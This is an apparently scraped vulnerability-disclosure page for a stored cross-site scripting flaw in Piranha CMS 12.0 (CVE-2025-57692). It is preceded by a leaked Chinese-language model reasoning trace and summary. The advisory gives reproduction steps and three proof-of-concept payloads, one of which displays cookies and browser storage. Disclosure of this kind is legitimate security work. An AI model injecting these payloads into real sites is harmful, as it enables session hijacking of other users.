好的,我现在要帮用户总结一篇文章的内容,控制在100个字以内。首先,我需要仔细阅读用户提供的文章内容。 这篇文章看起来是一个安全漏洞的报告,标题是Piranha CMS 12.0的存储型跨站脚本(Stored XSS)漏洞。作者是Chidubem Chukwu,日期是2025年9月26日。漏洞影响的是Piranha CMS的12.0版本,类别是Web应用,测试环境是Ubuntu 22.04和Chrome。 文章描述了漏洞的细节:通过/manager/pages路径,在标准页面或标准存档页面的文本内容块中注入恶意脚本。攻击者可以在另一个用户的浏览器中执行任意JavaScript代码。具体步骤包括登录管理面板、添加页面、插入包含恶意payload的文本块,然后保存。这些payload会在保存时立即执行,并且在其他人访问或预览页面时也会执行。 用户的要求是用中文总结内容,控制在100字以内,不需要特定的开头。因此,我需要提取关键信息:软件名称、版本、漏洞类型、触发方式、影响范围以及利用条件。 考虑到用户可能对技术细节不太熟悉,我需要用简洁明了的语言表达。同时,要确保包含所有重要信息:Piranha CMS 12.0存在存储型XSS漏洞,通过文本内容块注入脚本,在其他用户访问时触发。 现在整合这些信息:Piranha CMS 12.0版本存在存储型XSS漏洞,攻击者可通过文本内容块注入恶意脚本,在其他用户访问页面时触发执行。这样刚好控制在100字以内,并且涵盖了所有关键点。 </think> Piranha CMS 12.0 存在存储型跨站脚本(XSS)漏洞,攻击者可通过文本内容块注入恶意脚本,在其他用户访问页面时触发执行。 2026-2-5 21:42:25 Author: cxsecurity.com(查看原文) 阅读量:0 收藏
Piranha CMS 12.0 - Stored Cross Site Scripting
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting # Date: 2025-09-26 # Exploit Author: Chidubem Chukwu (Terminal Venom) # LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9? # Vendor Homepage: https://piranhacms.org # Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0 # Version: 12.0 # Category: Web Application # Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome # CVE: CVE-2025-57692 # Privilege Level: authenticated user # Patched Version: Not available # Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md ## Reproduction Steps ## PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser. Reproduction steps 1. Log in to the Piranha admin panel at https://<host>/manager/login. 2. Navigate to Pages. 3. Click Add Page and choose Standard Page or Standard Archive. 4. Enter a page title (e.g., XSS-Test). 5. Click the [ + ] button and select Text under Content to add a Text block. 6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page. Payload A <img src="x" onerror=" alert( 'Cookies: ' + document.cookie + '\n' + 'LocalStorage: ' + JSON.stringify(localStorage) + '\n' + 'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' + 'URL: ' + window.location.href + '\n' + 'User Agent: ' + navigator.userAgent + '\n' + 'Time: ' + new Date().toLocaleString() ) " /> Payload B — iframe base64 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> Payload C — details toggle (on-toggle alert) <details open ontoggle=alert('XSS')>Click</details> 7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others). 8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh